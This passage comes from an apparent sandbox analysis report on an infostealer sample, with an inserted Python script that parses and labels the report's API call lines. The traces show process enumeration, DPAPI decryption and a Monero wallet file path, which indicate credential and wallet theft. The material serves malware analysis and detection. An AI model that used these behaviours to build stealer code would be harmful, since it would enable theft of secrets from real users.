                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: =ux$T$?$ae_$gjn$r[
                                  • API String ID: 0-3134275356
                                  • Opcode ID: 7b41f8b00b6afa89d1a7a0ceb616bce749d9f1eee6ddf8466238aa19ec823bd6
                                  • Instruction ID: 30504bf31b7c7e2eb99cff2aa04dfb5de1a76d1a5b1578334672b369aac577e9
                                  • Opcode Fuzzy Hash: 7b41f8b00b6afa89d1a7a0ceb616bce749d9f1eee6ddf8466238aa19ec823bd6
                                  • Instruction Fuzzy Hash: 64B206F3A0C2109FE3046E2DEC8566AFBE9EF94720F1A493DEAC4D7744E63558048796
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BAC871
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BAC87C
                                  • lstrcat.KERNEL32(?,00BC0B46), ref: 00BAC943
                                  • lstrcat.KERNEL32(?,00BC0B47), ref: 00BAC957
                                  • lstrcat.KERNEL32(?,00BC0B4E), ref: 00BAC978
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: 904c5fffa0650c14f0111f8a7057592036b22753cfcec97b74e152a98c731f56
                                  • Instruction ID: 779bea64f7f8d8a56671353414a8c916ea79d5985791751c0e3724e89598cbdc
                                  • Opcode Fuzzy Hash: 904c5fffa0650c14f0111f8a7057592036b22753cfcec97b74e152a98c731f56
                                  • Instruction Fuzzy Hash: 8A41307590431ADBDB10DFA4DDC9BEEBBB8BB48704F1045A8F509A6280D7746A84CFA1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00BA724D
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BA7254
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00BA7281
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00BA72A4
                                  • LocalFree.KERNEL32(?), ref: 00BA72AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: f15c47fc2acf06db9d814134d8505359a632c05fe1ecd1ab57e4c0ab885a9380
                                  • Instruction ID: 1626efe96074a0bb64d6209372ae0b463e54fe9239ba93b195dd16235d31ceba
                                  • Opcode Fuzzy Hash: f15c47fc2acf06db9d814134d8505359a632c05fe1ecd1ab57e4c0ab885a9380
                                  • Instruction Fuzzy Hash: 96010075A44309BBDB10EBD8CD89F9D77B8EB44700F104159FB05EA2C0DA70BA008B65
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BB961E
                                  • Process32First.KERNEL32(00BC0ACA,00000128), ref: 00BB9632
                                  • Process32Next.KERNEL32(00BC0ACA,00000128), ref: 00BB9647
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 00BB965C
                                  • CloseHandle.KERNEL32(00BC0ACA), ref: 00BB967A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: dafc1b067660be51056617d7986e69795de2c395be09c7dda380dfac58fdc791
                                  • Instruction ID: 20c83777f69a116c5c91995a28974e3bba222900eaa6652309357437d5ad47a8
                                  • Opcode Fuzzy Hash: dafc1b067660be51056617d7986e69795de2c395be09c7dda380dfac58fdc791
                                  • Instruction Fuzzy Hash: D7010075A00309ABDB14EFA5CDC4BEDBBF8EB48300F1041C8A90AD6240D774AB40CF61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: APh_$a!s_$fro~$w54$|y3
                                  • API String ID: 0-221025883
                                  • Opcode ID: e8e7c9fc036da7b91911bda31eef9b540d721ebb0ec2f18fff048f8747c833ac
                                  • Instruction ID: 297b113f3a2e167d82d16ef889a88dd869624d57c11c412c0e8f52e1bc7f01c1
                                  • Opcode Fuzzy Hash: e8e7c9fc036da7b91911bda31eef9b540d721ebb0ec2f18fff048f8747c833ac
                                  • Instruction Fuzzy Hash: E18239F3A082049FE304AE2DEC8577ABBE9EF94720F1A453DEAC4C3744E57598058697
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00BC05B7), ref: 00BB86CA
                                  • Process32First.KERNEL32(?,00000128), ref: 00BB86DE
                                  • Process32Next.KERNEL32(?,00000128), ref: 00BB86F3
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                  • CloseHandle.KERNEL32(?), ref: 00BB8761
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: 826a037ead6826f696c3120bbd26a2ef838de3afd2f05e5f26bc2712d769810d
                                  • Instruction ID: 2d4a364344ea12089ec6d5afb7bf6ce8bfdfc0b1bac3cd5aea973fa30e4b25fd
                                  • Opcode Fuzzy Hash: 826a037ead6826f696c3120bbd26a2ef838de3afd2f05e5f26bc2712d769810d
                                  • Instruction Fuzzy Hash: 19314B71901218ABCB24EF95CC95FEEB7B8EF45700F1041D9E10AA62A0DFB06E45CFA1
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,00BA5184,40000001,00000000,00000000,?,00BA5184), ref: 00BB8EC0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: 17fe3ed6e826bb87ef9ea19d35d086a92ed98f6bf28b4241dadbdc2bfbfdea57
                                  • Instruction ID: 55de36bf48360342f1311e2a092c2d27ad4e2cb040f65ed7ee58a8c93027d6ce
                                  • Opcode Fuzzy Hash: 17fe3ed6e826bb87ef9ea19d35d086a92ed98f6bf28b4241dadbdc2bfbfdea57
                                  • Instruction Fuzzy Hash: CF11F270200609AFDB00DF68E884FBA37EDAF89300F109888F9198F250DBB5E841DB60
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BA4EEE,00000000,00000000), ref: 00BA9AEF
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00BA4EEE,00000000,?), ref: 00BA9B01
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BA4EEE,00000000,00000000), ref: 00BA9B2A
                                  • LocalFree.KERNEL32(?,?,?,?,00BA4EEE,00000000,?), ref: 00BA9B3F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: 9b607f45513cbd8ae8fba170e644648fec1b7e37b7c15ce17cece760b604dfbe
                                  • Instruction ID: 5c7c721f200a5706a275f0cb236460e592eacafd59dbd9895a3f39d6bea94db4
                                  • Opcode Fuzzy Hash: 9b607f45513cbd8ae8fba170e644648fec1b7e37b7c15ce17cece760b604dfbe
                                  • Instruction Fuzzy Hash: 991190B4240309AFEB10DF64DC95FAA77B5EB89700F208098F9159F390C7B6A941DBA0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00BC0E00,00000000,?), ref: 00BB79B0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB79B7
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00BC0E00,00000000,?), ref: 00BB79C4
                                  • wsprintfA.USER32 ref: 00BB79F3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: d6d71570f3d7d8feecacc35fc76752bab3436048e077514a15165722a54bda06
                                  • Instruction ID: 6daf51463b3fb115ba87a22f4b081d160cdedad0fc2fe4f55f792fafeda33ac0
                                  • Opcode Fuzzy Hash: d6d71570f3d7d8feecacc35fc76752bab3436048e077514a15165722a54bda06
                                  • Instruction Fuzzy Hash: 45113CB2904259ABCB14DFC9DD85BBEB7F8FB4CB11F10415AF605A2280E7795940C7B1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,01410658,00000000,?,00BC0E10,00000000,?,00000000,00000000), ref: 00BB7A63
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB7A6A
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,01410658,00000000,?,00BC0E10,00000000,?,00000000,00000000,?), ref: 00BB7A7D
                                  • wsprintfA.USER32 ref: 00BB7AB7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  • Opcode ID: 0788e55f8e4b9c1238b8e387fb6838736701c26df29101bdc542480bfc8b5507
                                  • Instruction ID: fa9f177973794a7c2afd7bec553188ea0103ac4c344a6dfc005160e32d3ff100
                                  • Opcode Fuzzy Hash: 0788e55f8e4b9c1238b8e387fb6838736701c26df29101bdc542480bfc8b5507
                                  • Instruction Fuzzy Hash: C81182B1945218DBDB209F58DC85FA9BBB8F744711F1043DAE506972D0D7742E40CF51
                                  APIs
                                  • CoCreateInstance.COMBASE(00BBE118,00000000,00000001,00BBE108,00000000), ref: 00BB3758
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00BB37B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  • Opcode ID: bf4fbc8bf34c453c393c5bb866d6edff7529d121d477360627929daa8e4807dd
                                  • Instruction ID: 1b8f7eff6ccf6faa401f9b282f7a668334da87aec9e15f3704b6657da02e7f47
                                  • Opcode Fuzzy Hash: bf4fbc8bf34c453c393c5bb866d6edff7529d121d477360627929daa8e4807dd
                                  • Instruction Fuzzy Hash: A5411B70A40A189FDB24DB58CC94BDBB7B4BB48702F4041D8E608E72D0D7B1AE85CF50
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BA9B84
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00BA9BA3
                                  • LocalFree.KERNEL32(?), ref: 00BA9BD3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: a72fccc323b667948166cd1c2ae4f00236fa5235ba010daf93eca867b9872bba
                                  • Instruction ID: 1aa8aeb3e5459a8d3d29a939da14a6e76e95893c041c2499c4905f33be0c204f
                                  • Opcode Fuzzy Hash: a72fccc323b667948166cd1c2ae4f00236fa5235ba010daf93eca867b9872bba
                                  • Instruction Fuzzy Hash: 1C11A5B8A00209EFDB04DF98D985AAE77B5FB89304F104598E915AB350D770AE50CFB1
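The API lines in the function blocks above are the part of this report an analyst actually works from: the raw argument constants say what each call does (0x2 to CreateToolhelp32Snapshot is TH32CS_SNAPPROCESS, 0x128 passed to Process32First/Next is the size of a 32-bit ANSI PROCESSENTRY32, 0x1 and 0x40000001 to the Crypt32 string calls are CRYPT_STRING_BASE64 with and without CRYPT_STRING_NOCRLF, 0x40 to LocalAlloc is LPTR), and the combinations are what the signature list at the top of the report summarises as process searching, DPAPI use and time-zone fingerprinting. The following Python is an added example, not part of the Joe Sandbox report and not code from the Stealc sample: it parses API lines copied verbatim from the Toolhelp32, Crypt32, LocalAlloc and GetLocalTime blocks above, names the constants, and tags the capabilities. The capability labels, the rule that a string compare inside a Process32Next walk means a process-name check, and the tolerance of the regex for the "Part of subcall function" prefix are this example's own choices; the Windows constant values are the documented ones.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Input for the example: API lines copied from the function blocks of this
# report (the Toolhelp32 walk, the Crypt32 base64 and DPAPI calls, the
# LocalAlloc and GetLocalTime calls), plus one non-API line to show it is skipped.
REPORT_LINES = """\
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BB961E
• Process32First.KERNEL32(00BC0ACA,00000128), ref: 00BB9632
• Process32Next.KERNEL32(00BC0ACA,00000128), ref: 00BB9647
• StrCmpCA.SHLWAPI(?,00000000), ref: 00BB965C
• CloseHandle.KERNEL32(00BC0ACA), ref: 00BB967A
  • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
• CryptBinaryToStringA.CRYPT32(00000000,00BA5184,40000001,00000000,00000000,?,00BA5184), ref: 00BB8EC0
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BA4EEE,00000000,00000000), ref: 00BA9AEF
• LocalAlloc.KERNEL32(00000040,?,?,?,00BA4EEE,00000000,?), ref: 00BA9B01
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BA9B84
• GetLocalTime.KERNEL32(?,?,?,?,?,00BC0E00,00000000,?), ref: 00BB79C4
• wsprintfA.USER32 ref: 00BB79F3
Memory Dump Source
"""

# Documented Windows constants (tlhelp32.h, winbase.h, wincrypt.h).
TH32CS_SNAPPROCESS = 0x00000002
PROCESSENTRY32_SIZE_X86 = 0x128   # ANSI PROCESSENTRY32 on 32-bit Windows; 0x130 on x64
LPTR = 0x00000040                 # LMEM_FIXED | LMEM_ZEROINIT
CRYPT_STRING_BASE64 = 0x00000001  # low byte of dwFlags is a format enum, not a bitmask
CRYPT_STRING_BINARY = 0x00000002
CRYPT_STRING_HEX = 0x00000004
CRYPT_STRING_NOCRLF = 0x40000000  # high bits are option flags OR'd into the format
CRYPT_STRING_NOCR = 0x80000000

API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"      # wsprintfA is logged without an argument list
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple    # int for hex literals, None where the sandbox logged '?'
    ref: int       # address of the call site inside the dumped module


def parse_api_lines(text: str) -> list[ApiCall]:
    """Turn the report's bullet lines into ApiCall records; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = tuple(None if a.strip() == "?" else int(a, 16)
                     for a in raw.split(",") if a.strip())
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16)))
    return calls


def crypt_string_flags(flags: int) -> str:
    """Name a CRYPT_STRING_* dwFlags value: format enum plus any option bits."""
    names = {CRYPT_STRING_BASE64: "CRYPT_STRING_BASE64",
             CRYPT_STRING_BINARY: "CRYPT_STRING_BINARY",
             CRYPT_STRING_HEX: "CRYPT_STRING_HEX"}
    parts = [names.get(flags & 0xFF, hex(flags & 0xFF))]
    parts += [name for bit, name in ((CRYPT_STRING_NOCRLF, "CRYPT_STRING_NOCRLF"),
                                     (CRYPT_STRING_NOCR, "CRYPT_STRING_NOCR"))
              if flags & bit]
    return " | ".join(parts)


def decode_args(call: ApiCall) -> dict[str, str]:
    """Name the argument constants an analyst would otherwise look up by hand."""
    a = call.args
    if call.api == "CreateToolhelp32Snapshot" and a[:1] == (TH32CS_SNAPPROCESS,):
        return {"dwFlags": "TH32CS_SNAPPROCESS"}
    if call.api in ("Process32First", "Process32Next") and a[1:2] == (PROCESSENTRY32_SIZE_X86,):
        return {"dwSize": "sizeof(PROCESSENTRY32), 32-bit ANSI layout"}
    if call.api in ("CryptStringToBinaryA", "CryptBinaryToStringA") and len(a) > 2 and a[2] is not None:
        return {"dwFlags": crypt_string_flags(a[2])}
    if call.api == "LocalAlloc" and a[:1] == (LPTR,):
        return {"uFlags": "LPTR (LMEM_FIXED | LMEM_ZEROINIT)"}
    return {}


def capabilities(calls: list[ApiCall]) -> list[str]:
    """Map the calls onto the behaviours the report's signature list names.
    The labels and the 'string compare inside the walk' rule are this
    example's own heuristics, not Joe Sandbox's signatures."""
    by_api: dict[str, list[ApiCall]] = {}
    for c in calls:
        by_api.setdefault(c.api, []).append(c)
    found = set()
    if "Process32Next" in by_api and any(
            c.args[:1] == (TH32CS_SNAPPROCESS,) for c in by_api.get("CreateToolhelp32Snapshot", [])):
        found.add("process-enumeration")
        if any(api.startswith(("StrCmp", "lstrcmp")) for api in by_api):
            found.add("process-name-check")
    for api, label in (("CryptStringToBinaryA", "base64-decode"),
                       ("CryptBinaryToStringA", "base64-encode")):
        if any(len(c.args) > 2 and c.args[2] is not None
               and (c.args[2] & 0xFF) == CRYPT_STRING_BASE64
               for c in by_api.get(api, [])):
            found.add(label)
    if "CryptUnprotectData" in by_api:
        found.add("dpapi-decrypt")
    if "wsprintfA" in by_api and any(api in by_api for api in ("GetLocalTime", "GetTimeZoneInformation")):
        found.add("time-fingerprint")
    return sorted(found)


if __name__ == "__main__":
    parsed = parse_api_lines(REPORT_LINES)
    for call in parsed:
        print(f"{call.ref:08X} {call.api}.{call.module} {decode_args(call)}")
    print(capabilities(parsed))
```

Run as a script it prints one decoded line per call and the capability list for the whole set; calling `capabilities()` on a single function block's lines (for example only the five Toolhelp32 lines) gives that block's tags, which is how the report's per-function "Similarity" entries line up with the signatures at the top.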
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 1C'{
                                  • API String ID: 0-102590864
                                  • Opcode ID: 7e789803abdaa91f5387f69267b8ca0da99a005db6bbc84220e322baed20eab5
                                  • Instruction ID: 0853ea17fae6e3de8304f2d9e1a948e6b3bc0edcf9529fc814f8725878fc6dc5
                                  • Opcode Fuzzy Hash: 7e789803abdaa91f5387f69267b8ca0da99a005db6bbc84220e322baed20eab5
                                  • Instruction Fuzzy Hash: B7B2D4F3A0C6049FE304AF29EC8567AFBE9EF94720F16493DEAC483744E63558058697
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: aXc$y:K
                                  • API String ID: 0-997329546
                                  • Opcode ID: 56adcba3a0559026fb7efae5596eaf99485e4db30c6af7efb1e34af9b87f7fa6
                                  • Instruction ID: cde2e4336934978c55f576f6c29599ae5de3a4cb1481d9849f2c759569516756
                                  • Opcode Fuzzy Hash: 56adcba3a0559026fb7efae5596eaf99485e4db30c6af7efb1e34af9b87f7fa6
                                  • Instruction Fuzzy Hash: BE518BF3E142045BE3006E3CED8573ABBDAEB90710F2A863DDA84C7385E939590487D6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
